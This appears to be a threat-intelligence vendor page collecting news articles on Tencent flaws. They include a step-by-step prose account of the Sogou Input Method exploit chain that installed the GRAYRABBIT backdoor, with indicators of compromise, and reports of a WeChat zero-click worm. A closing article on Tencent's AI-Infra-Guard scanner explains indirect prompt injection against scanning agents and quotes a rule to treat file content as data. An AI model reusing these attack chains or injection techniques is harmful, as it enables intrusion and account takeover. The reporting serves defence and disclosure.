Search/tencent
Vendor

tencent

Known CVEs
0
Highest CVSS
In KEV
0
Vendor
vconsole
Connections
98 relationships
Chinese Hackers Exploit Critical Tencent Software Flaw for One-Click Code Execution
A critical-severity vulnerability in Sogou Input Method has been exploited by a Chinese threat actor to deploy a backdoor, Gen Threat Labs reports. Developed by Tencent, Sogou Input Method is one of the most popular Chinese-language input method editors (IMEs) for Windows and is used by hundreds of millions of users. It is a collection of executables that communicate using a custom protocol scheme named sgbiz. When a URL is opened, the protocol handler (biz_helper.exe) parses the URL and dispatches it to the appropriate component. The critical flaw, tracked as CVE-2026-51990, chained three security weaknesses in a one-click exploit: unvalidated command-line argument injection, unrestricted URL navigation, and an outdated, un-sandboxed Chromium browser engine. According to Gen Threat Labs, the first issue existed because, during URL parsing, the protocol handler did not sanitize or validate the ‘param’ parameter, which controls the command-line arguments passed to the executable. This allowed an attacker to inject command-line arguments in the URL to declare a ‘skincenter’ page, which another function would simply copy and navigate the browser to. The next security hole goes deeper: the browser in Sogou Input Method is based on a Chromium 80 iteration released in March 2020 that is missing roughly six years of security patches, has the sandbox completely disabled, strips additional protections (including same-origin policy), and allows URLs to read other local files. The China-linked threat actor UNC3569 used this exploit chain to send crafted sgbiz URLs to unsuspecting victims. Once clicked, the exploit provided the attackers with system-level code execution. “We observed this vulnerability actively exploited in the wild by the UNC3569 threat group to deploy the GrayRabbit backdoor through a crafted link,” Gen Threat Labs says. Potentially linked to Chinese private contractor company i-SOON, UNC3569 is known for exploiting vulnerabilities in popular software to attack government, education, technology, and finance organizations globally. The GrayRabbit backdoor, which has been consistently observed across the threat actor’s intrusions since at least 2021, provides attackers with a reverse shell and can execute processes, load plugins, write data to the interactive shell, upload files to its command-and-control (C&C) server, collect system information, and terminate itself. Gen Threat Labs reported CVE-2026-51990 to Tencent on April 9. The security defect was addressed in Sogou Input Method version 16.3.0.3498, which was rolled out to all users via the automatic update mechanism. The fix added a check for URL-bearing switches in the protocol handler, but left the underlying Chromium configuration unchanged. According to Gen Threat Labs, as of September 10, the configuration and version have not been updated. Related: AI Is Giving Lesser-Resourced Attackers Nation-State-Level Reach, Google Warns Related: US, Allies Warn of Russian Cyberattacks Targeting Critical Infrastructure Routers Related: China, India-Linked Hackers Both Targeted Same Pakistani Police Force Related: Chinese Hackers Target Medical, Military, and AI Research in North America
securityweek.comSep 14, 2026extracted
Hackers exploit Tencent app flaw to deploy GrayRabbit malware
Threat actors linked to a China-aligned espionage group are exploiting a critical vulnerability (CVE-2026-51990) in Tencent’s Sogou Input Method for Windows to deploy the GrayRabbit backdoor. Researchers at cybersecurity company Gen Digital warn that the security issue is a one-click remote code execution (RCE) flaw. "We observed this vulnerability actively exploited in the wild by the UNC3569 threat group to deploy the GRAYRABBIT backdoor through a crafted link," Gen Threat Labs says. Sogou Input Method is a popular Windows application that lets users type Chinese characters using a standard keyboard and also offers a custom link handler and a built-in web browser using an outdated Chromium engine. Developed by Chinese tech giant Tencent, Sogou Input Method reportedly has hundreds of millions of installations in China. Gen Threat Labs reports that UNC3569 chains three weaknesses in the product: an unvalidated command-line argument injection in the sgbiz: URI an unrestricted URL navigation in a CEF-based webview an outdated, unsandboxed Chromium browser engine The attack chain starts with the victim clicking a crafted sgbiz: custom URI, causing Windows to invoke Sogou’s biz_helper.exe protocol handler, which passes attacker-controlled command-line arguments to the legitimate SGMyInput.exe executable without validating them. The attacker-injected arguments open Sogou’s skincenter component and instruct its embedded Chromium webview to load an attacker-controlled URL. Sogou does not restrict the URL’s scheme or destination. In the third stage, a malicious page exploits a known vulnerability in Sogou’s outdated Chromium 80 engine. Because the browser runs without a sandbox and with important web-security protections disabled, the exploit achieves code execution and installs the GrayRabbit backdoor. In 2024, Google researchers described GrayRabbit as a modular malware family and linked it to UNC3569, a China-based threat actor operating across both the cybercrime and cyber contractor-for-hire ecosystems. The malware sample that Gen Threat Labs analyzed is a more mature 64-bit variant with an expanded command set and RC4-encoded command-and-control (C2) configuration. Its capabilities include process execution, opening interactive reverse shells, uploading and downloading files, collecting system and user information, and reflectively loading plugins in the host’s memory. Gen Threat Labs reported their findings to Tencent on April 9, and the software vendor deployed a fix in Sogou Input Method version 16.3.0.3498, released on April 21. The patch validates the URL arguments accepted through the protocol handler, permits only HTTPS, and restricts navigation to approved domains related to Sogou and Tencent. However, the researchers warned that the underlying browser remains outdated and still runs without a sandbox, with many web security protections disabled. Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed. Save your seat
bleepingcomputer.comSep 13, 2026extracted
Week in review: Linux rootkit deployed on F5 BIG-IP APM devices, Cisco FMC bugs exploited
Week in review: Linux rootkit deployed on F5 BIG-IP APM devices, Cisco FMC bugs exploited Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Zero trust AI agents demand a different kind of security In this interview, Chris Webber, VP, Product Marketing at Teleport, explains why zero trust principles need to change for AI agents. He covers how agents act fast, unpredictably, and continuously, and why old ideas like least privilege and point-in-time verification fall short. AI-Infra-Guard: Open-source security scanner for AI systems Tencent’s Zhuque Lab built AI-Infra-Guard, an open-source security scanner for AI systems. It fingerprints running services such as Ollama, vLLM and ComfyUI and checks them against more than 1,600 known CVEs, inspects MCP servers and agent skills across 14 categories of risk, and runs jailbreak evaluations against a target model. Kevin Mandia joins the Amazon board with 30-plus years in cybersecurity Amazon elected Kevin Mandia to its Board of Directors on September 8. Mandia founded Mandiant and served as its CEO before Google acquired the firm in September 2022, and he has worked against cyber threats in the public and private sectors for more than 30 years. Getting a stranger’s phone kicked off the cellular network costs a few dollars Researchers at Michigan State University and three partner schools bought a Samsung Galaxy Z Fold 7, copied the identification number printed on the sealed box, and reported the phone to its carrier as lost. Then they opened the box and set the phone up the way a launch-day buyer would. It would not connect. The phone was new, unopened, and sitting on a lab bench the entire time. The team found six weaknesses in the system carriers use to shut off lost and stolen phones, spanning the devices themselves, the carrier systems that take the reports, and the machinery carriers use to share block lists. Trezor customers hit with phishing calls and letters after shipping-partner breach Roughly 67,000 more customers of SatoshiLabs, the maker of hardware crypto-wallet Trezor, are at heightened risk of phishing attacks after their names, email addresses, phone numbers, and shipping addresses were exposed. “Zero-click” WeChat worm could hijack accounts and spread via a single call Researchers with security company Calif have discovered, weaponized, and privately reported to Tencent a critical vulnerability that allowed them to create “WeWorm”, a worm that spreads via WeChat calls without any user interaction. September 2026 Patch Tuesday: Record patch count, 2 zero-days, and a SigRed successor September 2026 Patch Tuesday is here, with Microsoft delivering another record-breaking number of patches, including those for two vulnerabilities that have been exploited as zero-days. Cisco FMC bugs exploited by nation-state and ransomware actors (CVE-2026-20079, CVE-2026-20316) State-sponsored and financially-motivated attackers are actively exploiting CVE-2026-20079, a critical authentication bypass vulnerability in Cisco Secure Firewall Management Center (FMC), which is used for centrally managing multiple Cisco Secure Firewall devices across a network. What breach and attack simulation needs to become in the AI era Breach and attack simulation (BAS) has always had a supply chain. Somebody has to read the threat report, pull out the techniques, and turn them into something that will actually run against your controls. That somebody has always been a human red team. Up until a few months ago, turning a major new threat into working simulation content within 24 hours counted as very fast. Gartner: 70% of SOCs will pilot AI agents. Only 15% will see results Gartner predicts that by 2028, 70% of large SOCs will pilot AI agents, but only 15% will see measurable gains without structured evaluation. The technology has already moved from Gartner’s Innovation Trigger to the Peak of Inflated Expectations. Prophet Security reports that 40% of security teams use AI daily, 56% are evaluating or piloting it, and just 4% have no plans to adopt. Ransomware negotiation tactics have turned into a business process In this Help Net Security video, Dave Ross, Senior Director of the Intelligence Fusion Team at Intel 471, explains what happens behind the scenes during ransomware negotiations. Building a ransomware decision tree before the call comes in In this Help Net Security video, Kerri Shafer-Page, VP of Incident Response at Arctic Wolf, walks through the ransomware decision tree in this video. She covers four areas where decisions need settling in advance, starting with containment. 18 ways to check whether data can be trusted for AI ETSI has published TR 104 180, a technical report that defines 18 metrics for measuring data quality, giving companies a way to check whether their data is good enough for AI before they use it. The report defines each metric and includes the formulas needed to calculate it. Attackers use rogue ScreenConnect clients to spread malware A file transfer flaw in ScreenConnect Remote Access Support and Access sessions affects both Cloud and On-Premise deployments, ConnectWise confirmed. Until a fix is available, ConnectWise recommends that partners disable file transfers for technicians. N-able patches critical N-central zero-day exploited in the wild (CVE-2026-86218) N-able released an emergency hotfix for CVE-2026-86218, a remote code execution (RCE) flaw affecting N-central, its remote monitoring and management (RMM) solution popular with managed service providers (MSPs). In its release notes, N-able described CVE-2026-86218 as a “critical-CVSS-rated vulnerability that could allow for pre-authenticated remote code execution on the N-central server.” Hackers exploit RouterOS flaws to hijack MikroTik devices without authentication Attackers are exploiting a chain of RouterOS vulnerabilities to hijack MikroTik devices with SSH open to the internet, CERT Polska found. They have discovered six vulnerabilities in RouterOS and coordinated their disclosure with MikroTik. Among the six, two combined let an attacker take full control of a device without authentication, provided the device has SSH accessible from the internet. They named this exploit chain MikroTrick. Mathspace breach exposes data on over a million students and parents Mathspace has confirmed that attackers broke into its internal reporting system through an unpatched Metabase vulnerability and stole data belonging to more than a million students, parents, and school staff. The Sydney-based maths education company wrote in a blog post that the vulnerability, in its self-hosted installation of Metabase, allowed attackers to obtain administrator access to the system without a legitimate login. IT help-desk vishing tricks executives into handing over Microsoft 365 access IT help-desk vishing calls, stolen session tokens, and sign-ins routed through residential proxies are behind a wave of data theft and extortion against Microsoft 365 and other SaaS accounts, according to Arctic Wolf. Threat actors are giving AI agents a bigger role in cyberattacks AI agents are automating parts of cyberattacks with less human involvement, including vulnerability scanning, credential harvesting, and troubleshooting, according to Google Threat Intelligence Group’s Q3 2026 AI Threat Tracker. Google fixes yet another actively exploited Chrome zero-day (CVE-2026-87491) Google has fixed 230 vulnerabilities in Chrome, including a zero-day flaw, CVE-2026-87491, with an in-the-wild exploit. The fix has been shipped in Chrome 153.0.8010.36 and .37 for Windows and macOS and Chrome 153.0.8010.36 for Linux. Hackers deploy Linux rootkit on F5 BIG-IP APM devices, hiding web shell in memory A rootkit found on hacked F5 BIG-IP APM devices skips the usual step of writing a web shell to disk, hiding it in memory instead, according to Sophos. F5 BIG-IP APM provides access policy enforcement to secure access to apps, APIs, and data. It’s primarily used by enterprises, financial institutions, government agencies, and public sector organizations. $245 million in stolen crypto funded racketeering crew’s lavish lifestyle A 22-year-old man built his fortune by breaking into strangers’ digital wallets, then spent it on nightclub tabs, private jets, and a fleet of cars worth millions. Malone Lam, a Singapore citizen, pleaded guilty this week in a Washington D.C. federal court to running a racketeering conspiracy that stole and laundered more than $245 million in cryptocurrency. OpenSSL’s new alpha build speeds up post-quantum crypto The OpenSSL project released the first alpha of OpenSSL 4.1.0, giving developers an early look at a version built for encrypted communication over unreliable connections and faster post-quantum cryptography. This marks the opening test build for a version still months from general availability. Cybercriminals are building phishing pages that exist only inside victims’ browsers A phishing campaign routes victims through genuine Microsoft OAuth and Teams infrastructure before showing them a fake login page built entirely inside their own browser, according to researchers at Barracuda. Fake GTA 6 download delivers malware-packed bundle to impatient gamers Grand Theft Auto VI (GTA 6) is still three months from release, but cybercriminals are not waiting for the launch date. Security firm Huntress found malware disguised as a leaked copy of the game, aimed at fans hoping to get their hands on it early. Attackers call employees’ personal phones to break into Microsoft 365 accounts Attackers are calling or texting employees on their personal phones, posing as internal IT staff, in a social engineering campaign that tricks them into handing over access to corporate cloud accounts. Once inside, they pull files and email from Microsoft 365 apps, SharePoint, OneDrive, and inboxes, for weeks at a time, according to Microsoft Security Research. IDScan confirms breach after 153 million driver’s licenses leak on dark web Days after reports linked IDScan to a dark web database holding more than 153 million driver’s license scans, the identity verification company has confirmed hackers accessed customer data stored on its cloud platform. AI agents exploited PaperCut flaws to breach 395 organizations A threat actor built a working exploit for PaperCut print management software, then handed the job of breaking into hundreds of organizations to AI agents that did most of the work on their own, according to GreyNoise. ToolHive: The open-source way to run any MCP server securely ToolHive is an open-source platform that runs Model Context Protocol servers inside containers. An MCP server is the connector that lets an AI client like Cursor or Claude Code reach an outside tool, and Stacklok ships ToolHive under Apache 2.0, so the runtime, the Kubernetes operator, and the registry cost nothing to self-host. OpenAI just hit a milestone on the road to self-improving AI OpenAI has announced that it has reached a goal set last fall of having an automated research intern by September 2026. The milestone means a system can carry out well-defined research tasks under human direction, including work that would take a skilled researcher several days. The company is also working toward creating an automated AI researcher by March 2028. Microsoft’s Project Zenith puts large AI models directly on developer PCs Microsoft’s Project Zenith is a ready-to-code Windows 11 experience for developer-class PCs capable of running AI models with more than 30 billion parameters locally without relying on metered cloud tokens. Designed for systems with at least 64 GB of unified memory and 250 GB/s or more of memory bandwidth, it pairs powerful hardware with a preconfigured software environment for coding, testing, and experimentation. Jellyfin 12.0 security fixes arrive alongside the removal of legacy client logins Jellyfin shipped version 12.0 of its media server. Several of the security fixes in it block requests built to reach files outside the folders the server is supposed to hand out. The rest of the security work touches first-run setup, plugin installs, parental controls, and the web interface. BleachBit 6.0.4 fixes secure wiping that skipped clusters on Windows The open source cleaner BleachBit reached version 6.0.4 this week, erasing caches, browser traces, and files on Windows, Linux, and now macOS. If you shredded a sensitive file on Windows with an earlier build, parts of it may still sit on the disk where the wipe missed. Fragmentation is the ordinary case, since Windows scatters a file across noncontiguous clusters whenever it cannot find one open run large enough to hold it. AWS spent years rebuilding its routing control plane without taking the network down Every AWS API call, CloudFront video stream, and Route 53 lookup crosses the same infrastructure, which AWS calls its border network. It now runs on a routing system rebuilt from scratch over several years. Chinese AI firms are siphoning capabilities from American models, CISA warns China-based AI companies are using large-scale knowledge distillation campaigns to copy capabilities from leading U.S. AI models, according to a joint cybersecurity advisory from the CISA, NSA, and FBI. A new open standard locks AI weights to approved hardware OPAQUE, a confidential computing company that runs AI workloads inside hardware-isolated environments so operators cannot inspect them, released an open standard that lets AI model builders decide when and where their weights can be decrypted once those weights leave the builder’s own servers. The standard, called Weight Custody Manifest, ships as a developer-preview specification, a Python SDK, and a public test suite covering 91 cases. AI adoption brings new security headaches for already stretched CISOs CISOs are taking on AI governance without a matching increase in resources or expertise, adding to an already broad remit spanning data protection, identity, resilience and compliance, according to Proofpoint’s 2026 Voice of the CISO report. Apple is building photo verification for the people who need it most Apple has introduced Apple Reference Image, an opt-in feature designed to verify the authenticity of photos taken with iPhone 18 Pro models. The company will also add support for the SynthID standard in a software update later this year, helping identify images generated or edited using AI. WordPress adds automated security checks to block risky plugin releases WordPress’ automated security review will now assess every plugin release before it is distributed through the WordPress.org update API. Releases considered a potential security risk will be blocked automatically. Your passkeys can now move between password managers on Android Google turned on a transfer feature in Android that moves passwords and passkeys straight from one password manager to another, with no file to download along the way. You start it from inside the app you are switching to, and Google says the data moves between the apps in a few seconds. Ubuntu 24.04.5 LTS release patches security bugs across ten flavors Canonical shipped Ubuntu 24.04.5 LTS, bundling security updates and fixes for high-severity bugs into new installation media for the “Noble Numbat” release. Anyone installing fresh now gets those corrections baked in from the start, cutting the batch of updates that would normally follow setup. AI is changing what Salesforce security needs to govern Existing security and governance practices have largely focused on identities, permissions, access, configurations and controls. WithSecure’s Navigating Trust in the Modern Salesforce Ecosystem paper says Salesforce environments also require organizations to understand what information they rely on, how trust extends across connected systems, what actions are performed and what outcomes those actions produce. Companies may be measuring phishing resilience the wrong way Companies that judge phishing simulation programs by how often employees click simulated attack emails may be overlooking more important indicators of cyber resilience, according to Pistachio’s Phishing Behaviour Report 2026. Product showcase: Doppler secures secrets for humans, pipelines, and AI agents AI agents have expanded the secrets management challenge. Coding agents, automated workflows, and MCP servers create more identities that need credentials, and more places those credentials can leak. Doppler centralizes credentials for engineers, pipelines, and AI agents in one easy-to-use control plane. It gives security teams a critical secrets management tool developers use, available in the cloud or on-prem. Product showcase: GitGuardian Honeytoken catches credential theft as it happens GitGuardian turns credential harvesting into an immediate, high-confidence detection signal. It deploys honeytokens across developer fleets so that when an infostealer scans a machine and validates a decoy, defenders know within seconds. Cybersecurity jobs available right now: September 8, 2026 We’ve scoured the market to bring you a selection of roles that span various skill levels within the cybersecurity field. Check out this weekly selection of cybersecurity jobs available right now. New infosec products of the week: September 11, 2026 Here’s a look at the most interesting products from the past week, featuring releases from Akeyless, Orchid Security, Scytale, and Securin.
helpnetsecurity.comSep 13, 2026extracted
China-Linked UNC3569 Exploited Sogou Input Method Flaw to Deploy GRAYRABBIT Backdoor
A China-linked hacking group exploited a flaw in Sogou Input Method, one of the most widely used tools for typing Chinese characters on Windows, to install a backdoor on victims' computers, security company Gen Digital said in research published Thursday. The attack started with a crafted link and ended with the attacker able to do anything the logged-in user could do. Tencent, which owns and develops Sogou, fixed the flaw in April 2026. Gen found the flaw while investigating a live intrusion by UNC3569, a group that Google Threat Intelligence ties to China and places in the country's hacker-for-hire scene. Google has tracked the group since 2021 and says it has targeted government, education, technology, and finance sectors, mostly in East and Southeast Asia. The backdoor it installed is GRAYRABBIT, a small program the group has used for years and that Google describes as its first step onto a machine. It gives an attacker a remote command shell, allows files to be moved in both directions, and can load additional modules from the attacker's server at any time. Tencent's fix blocked the way in. It did not change the part of Sogou that made the attack possible. In the patched version Gen examined, the built-in browser engine is still the 2020 version, and its sandbox is still switched off. How One Link Reached the Machine Sogou Input Method is the most popular Chinese input method in China, according to 2023 research by Citizen Lab at the University of Toronto. That research put its user base at more than 455 million people a month across Windows, Android and iOS, and its share of Chinese input-method users at about 70%. Citing market research on visits to the product's website, it also noted that users are not only in China, with the United States accounting for over 3.3% of visits. The same research found flaws in the app's encryption that exposed what people typed. The flaw Gen found is in the Windows version. Sogou Input Method is not one program there. It is a set of components that communicate with each other via a custom link type registered on Windows, sgbiz:. When anything opens an sgbiz: link, Windows passes it to biz_helper.exe, which reads the link and starts the Sogou component it names. That handler checks which program the link asks it to start. It does not check the command-line arguments the link asks it to pass along. Gen found no filtering on them at all. So the attacker picked the arguments. The link pointed at SGMyInput.exe, Sogou's settings program, and told it to open the skin store with a web address of the attacker's choosing. The skin store is the only screen in that program that opens a browser window. The code sends that browser to whatever address it is handed, with no check on the address at all. That browser is where the third problem sits. Sogou builds its own copy of Chromium, and it's version 80, from around March 2020. Gen found two of the browser's protections switched off and written into the code that way: the sandbox, which normally keeps a compromised web page away from the rest of the computer, and the same-origin policy, which stops a page reading data from other sites. With the sandbox gone, a JavaScript flaw in the page becomes code that runs on the user's computer with the user's privileges. There is no second step to exit the browser. Gen says clicking the link was all it took. Tencent does not agree. In a response quoted in the research, Tencent described the chain as relatively complex and said an attacker would need social engineering to get the user to "actively authorize the browser's pop-up prompt." Browsers built on Chromium do show a confirmation box before handing a link to a separate program on the computer, and a user can tick a box to stop seeing it for a given site. Neither company says what the people in this campaign saw. Gen says the link could also arrive by email or chat message, and neither account says what a user sees when a link is opened that way. Why a 2021 Browser Bug Still Worked The page the victims were sent to carried an exploit for CVE-2021-38003, a flaw in how V8, Chrome's JavaScript engine, handled JSON.stringify. It let an internal value that scripts should never see escape into the page, and from there an attacker could corrupt memory and run code. Google fixed it in Chrome 95 in October 2021. CISA added it to its catalog of vulnerabilities known to have been exploited on November 3, 2021. Singapore firm STAR Labs published a full analysis and working exploit code in December 2022. Sogou's Chromium build never received that fix. It never got most of the others either. Of the 41 Chromium V8 flaws in CISA's catalog, at least 32 were fixed in Chrome releases that came out after the version Sogou ships. The Hacker News checked each flaw's CVE record against that version. That is a count of flaws, not a count of ways into Sogou. Whether any of them can be reached through the skin store window depends on what the page can touch inside it, and no one has published that work. What Landed on the Machine The exploit carried a small downloader. Gen traced it pulling three files from a server on Alibaba Cloud in Hong Kong: a legitimate copy of 7-Zip, a malicious DLL, and an encrypted file holding the final payload. All three went into C:\Users\Public\Documents. The malicious DLL was saved under the name 7-Zip loads from its own folder at startup, so running 7-Zip loaded the attacker's code instead. The archive command the attackers ran was meaningless. Its only job was to start 7-Zip. The DLL counts the processes running on the computer before it decrypts anything. If it finds fewer than 50, it builds the wrong key and the payload turns to garbage. Automated malware-analysis systems tend to run few processes. Real desktops do not. It then deletes itself. Gen found it moving its own contents into an NTFS alternate data stream, a hidden part of the file record, and then marking the file for deletion. The file leaves the disk with no delete call in the behavior logs. What it leaves behind is GRAYRABBIT. The backdoor reaches its server at mail.uaiubifas[.]top on port 443, and the traffic there is plain TCP scrambled with RC4 rather than TLS. Port 443 typically carries TLS, so non-TLS traffic on that port is worth watching. What Tencent Fixed, and What It Left Gen reported the flaw to Tencent on April 9, 2026, and it is tracked as CVE-2026-51990. Tencent replied the next day and confirmed on April 21 that a fix was complete and would go out to all users via an automatic update in version 16.3.0.3498. That is 12 days. The whole fix sits in biz_helper.exe. It now looks for the two arguments that carry web addresses, rejects anything that is not HTTPS, and checks the hostname against four allowed endings: sogou.com, qq.com, woa.com and sogou. Gen says more checks were added after that. The browser engine was not touched. In the patched files Gen examined, the sandbox setting is still off, the web security flag is still written into the code, and the same switches are still applied. The engine is still Chromium 80. What has changed is that an outsider can no longer point it at an address of their choosing via the link handler. Gen said those components need more work. What to Do Update Sogou Input Method. The fix is in version 16.3.0.3498, which Gen says Tencent pushed to all users by automatic update on April 21, 2026. Two things are missing from the public record. Neither Gen nor Tencent has said which versions were affected, and neither explains how to check the version installed on a machine. If a machine may have been reached before the fix, look for the indicators below. The loader deletes itself, so the malicious DLL may no longer be on disk. No source says whether installing the fix removes a backdoor that is already running. Gen published the following indicators. SHA-256 29c7ee41d0cc9e07d981e451df56d0c3d37c41ac4ec10c7b516cc033ee397a63 malicious DLL loader, written to disk as 7z.dll SHA-256 749160a2f20f82744026719cf72e483595c6aad718efa74d675a98662e02422e encrypted payload file, named p SHA-256 d7a3c7eb94edc0e020f74c678743d71d61e944634aade4a67a96c3589e828b3a GRAYRABBIT backdoor, internal name core.dll Domain mail.uaiubifas[.]top backdoor command server, port 443 Domain noht1ng[.]top hosted the exploit page IP 8.218.50[.]207 staging server, Alibaba Cloud Hong Kong Path C:\Users\Public\Documents\ where the three files were written
thehackernews.comSep 11, 2026extracted
Ti hanno chiamato su WeChat e ti hanno hackerato senza risposta
Non è solo WhatsApp s offrire di RCE full chain 0-click. Questa volta i ricercatori di Calif hanno scoperto WeWorm , che permette di compromettere account WeChat tramite una semplice chiamata in arrivo. La vittima non doveva nemmeno rispondere alla chiamata, e dopo la compromissione il worm poteva autonomamente chiamare altri contatti e diffondersi ulteriormente. Gli sviluppatori di Tencent comunicano di aver già corretto la vulnerabilità per tutti gli utenti. Gli esperti spiegano che per realizzare l’attacco era necessario soddisfare una sola condizione: il chiamante doveva essere nella lista dei contatti WeChat della vittima. Tuttavia, dopo il primo attacco riuscito, questa limitazione non ostacolava più la diffusione del worm. Dopo aver compromesso un account, il malware poteva chiamare autonomamente altre persone nella lista dei contatti, poiché l’utente compromesso era già stato aggiunto ai contatti WeChat. Questa catena di eventi è stata dimostrata dagli esperti nel video , dove uno smartphone Android effettua una chiamata a un iPhone di destinazione e compromette l’account WeChat mentre il dispositivo continua a squillare. Successivamente, l’iPhone compromesso attacca un secondo dispositivo Android nello stesso modo. I ricercatori sottolineano che rispondere alla chiamata malevola non salvava dalla compromissione . Rifiutare una tale chiamata fermava il tentativo di attacco, ma l’attaccante poteva semplicemente richiamare in un altro momento, ad esempio quando la vittima dormiva. Dopo un attacco riuscito, l’attaccante otteneva il pieno controllo dell’account WeChat della vittima: poteva leggere e inviare messaggi, effettuare chiamate e agire a nome dell’utente. Si riporta che l’attacco non comprometteva lo smartphone nel suo insieme. Alla base di questo attacco c’era una vulnerabilità legata al danneggiamento della memoria nello stack VoIP di WeChat , responsabile dell’elaborazione delle chiamate vocali. I ricercatori hanno scoperto che il problema poteva portare all’esecuzione remota di codice arbitrario, attraverso una chiamata in arrivo e senza richiedere alcuna azione da parte della vittima.  Gli esperti hanno testato il loro attacco contro WeChat 8.0.76 per Android e 8.0.75 per iOS. Gli esperimenti sono stati condotti su iOS 26.6 e diverse versioni più vecchie di Android. Tuttavia, l’elenco completo delle versioni di WeChat vulnerabili non è noto, e non viene specificato se il problema interessava i client WeChat per HarmonyOS, Windows, macOS e Linux. Curiosamente, i ricercatori sono stati facilitati dall’IA: in Calif hanno creato un set di competenze che guidavano il modello nella ricerca di vulnerabilità nei messenger. Secondo gli esperti, per rilevare il problema e creare il primo exploit con esecuzione del codice sono serviti solo circa due giorni, mentre per lo sviluppo del worm è stata necessaria un’altra settimana. L'articolo Ti hanno chiamato su WeChat e ti hanno hackerato senza risposta proviene da Red Hot Cyber .
redhotcyber.comSep 10, 2026extracted
Researchers Build WeChat Zero-Click Worm Hijacking Phones via Calls
A team of researchers at Calif, a cybersecurity startup based in Palo Alto, California, has built a tool capable of hacking Android and iOS phones via a simple incoming call. The hacking tool, dubbed WeWorm, relies on the exploitation of remote code execution (RCE) vulnerabilities in WeChat, a Chinese super-app that allows users to exchange messages, calls, make purchases, place transactions and more. It is “the first zero-click worm to spread through WeChat calls across iOS and Android,” Calif researchers claimed in a disclosure report dated September 8. They tested the tool on several test phones, including Google Pixel 10a models and an iPhone 17e model. Memory Corruption in WeChat’s VoIP Stack The researchers found the RCE bug in WeChat in July using a combination of large language models (LLMs), including open-weight ones and closed-sourced models from US frontier labs. They declined to reveal the models they used and did not provide any details on the vulnerability. They only explained that the flaw is a memory corruption issue in WeChat's voice-over-IP (VoIP) stack that relies on the privileges WeChat trusted contacts have when communicating with another user of the app. They said, however, that their WeChat account was initially banned after they reported the flaw to Tencent, the company behind WeChat. The Chinese firm later confirmed that exploiting the vulnerability could allow an attacker to perform remote command execution, and provided patched versions of the app on Android (8.0.77) and iOS (8.0.76). Meanwhile, Calif researchers developed exploits for vulnerable WeChat apps in two days and then integrated them to the WeWorm hacking tool, which they said took them an additional week to build. WeWorm Hijacks Accounts via WeChat Calls WeWorm provides the attacker with full control of the targeted WeChat account and allows the attacker to read and send messages, make calls and act on the victim's behalf. “The victim does not need to answer the call or interact with their phone at all. Even if they do answer, they hear nothing, and the exploit still succeeds. Declining the call stops that attempt, but the attacker can simply try again later, for example, while the victim is asleep,” the researchers wrote. While the exploit requires the attacker to be on the victim's friend list, this limitation is “not much of a barrier” as “an attacker can compromise one of your friends first and use their account to reach you,” they added. Additionally, they said that chained with other Android and iOS bugs, WeWorm can lead to full control of the device. “A worm at this scale used to be the kind of thing that took a larger team months. AI can already do most of the work here. Our team provided the judgment about what to target and how to test it safely,” Calif researchers concluded. Image credits: tovovan / Mamun_Sheikh / Shutterstock.com
infosecurity-magazine.comSep 9, 2026extracted
WeChat worm could pwn a friend before they even answered the call
ai and ml Anthropic reveals fourth likely crime committed by its AIClaude's Felony Bench rap sheet is now as long as OpenAI's SYSTEMS Samsung to help fortify OpenAI's semiconductor supply chainSemiconductor supply chains are hard, but Samsung offers OpenAI relief in many forms spanning compute and memory AI+ML Google DeepMind rises above the AI scrum with genome atlasSee, AI can be used for good ... or at the very least, a useful distraction from the bad AI and ML Amazon ropes Qualcomm into something, something AI, networking chipsMulti-generation chip collab is more buzzwords than compute On-PREM AMD's Threadripper Halo is a local-AI workstation for researchers with deep pocketsAI workstation promises to put up to 576 GB of HBM3e and 16 TB/s of memory bandwidth on your desk Security Russians are posing as Signal support to launch phishing attacksPLUS: US takes down Iranian propaganda sites; Marketing company asks 'Why Do We Have Your Information?' And more! Security Microsoft patches failed to fix on-prem SharePoint, which is now under zero-day attackPLUS: China upgrades smartphone surveillance tools; Ring eases anti-snooping stance; and more Black Hat and DEF CON DEF CON Franklin project enlists hackers to harden critical infrastructureVoting village reports have been so successful, says Jeff Moss, that the whole of DEF CON will now be included Security EQT buys majority share in Swiss cybersecurity biz AcronisWent at equivalent of $3.5B+ valuation for entire firm, though portion sold not specified Malware Month Ten years since the first corp ransomware, Mikko Hyppönen sees no end in sightOn the plus side, infosec's a good bet for a long, stable career Switzerland tests a FOSS escape route from Microsoft 365Swiss Army sticks a knife in American cloud apps with its own FOSS push Feel peak Windows was 7? You might like Kumander LinuxDebian and Xfce – solid, sensible choices – with a pretty skin Canonical shuttering some of its legacy chat channelsThe Ubuntu Pastebin went in June, IRC gets demoted next Audacity audio-editing app no longer looks like it's from the early 2000sThe FOSS tool for audio editing has a fresh coat of paint, and new features to boot Haiku OS rises / Beta 6 sails open web / Virtual winds fly fastA real alternative to running some kind of FOSS Unix clone Offshoots of cancelled TrueNAS Core upgrade to FreeBSD 15Exeunt zVault stage right; enter FreeCORE and BSDnas
theregister.comSep 9, 2026extracted
AI-Infra-Guard: Open-source security scanner for AI systems
AI-Infra-Guard: Open-source security scanner for AI systems Tencent’s Zhuque Lab built AI-Infra-Guard, an open-source security scanner for AI systems. It fingerprints running services such as Ollama, vLLM and ComfyUI and checks them against more than 1,600 known CVEs, inspects MCP servers and agent skills across 14 categories of risk, and runs jailbreak evaluations against a target model. To check a skill, the platform asks a language model whether it looks malicious. Zhuque Lab scores that call against SkillTrustBench, a public set of 5,520 human-labeled samples across nine risk categories. False positive rates there run from 1.20 percent to 18.67 percent, depending on which model does the judging. The model a team plugs in decides how much reading they end up doing. At the low end, about one clean skill in eighty gets flagged. At the high end, close to one flag in five is a waste of somebody’s afternoon. Banks, carriers and manufacturers use the tool, including ICBC, China Merchants Bank, China Telecom, Lenovo, vivo and Bilibili. Zhuque Lab splits the platform into two layers, and only one of them involves interpretation. “CVE version-matching isn’t intent-based at all,” the AI-Infra-Guard team said. “FPR there is purely a function of fingerprint accuracy.” The scanner reads files an attacker wrote Both scanning components ingest tool descriptions and skill files that a hostile server controls. Indirect prompt injection is the technique that exploits this: instructions buried in content the model reads, aimed at the model doing the reading. Release 4.1.9 hardened the scanning agents against it. “File/tool content that gets read is placed into a dedicated, explicitly-delimited text block in the prompt, structurally separated from instructions, rather than mixed inline. The scanning agent is told to treat that block as data to analyze, never as commands to follow,” the team told Help Net Security. The move “cuts naive-to-moderate injection significantly,” but “it’s a mitigation, not a formal 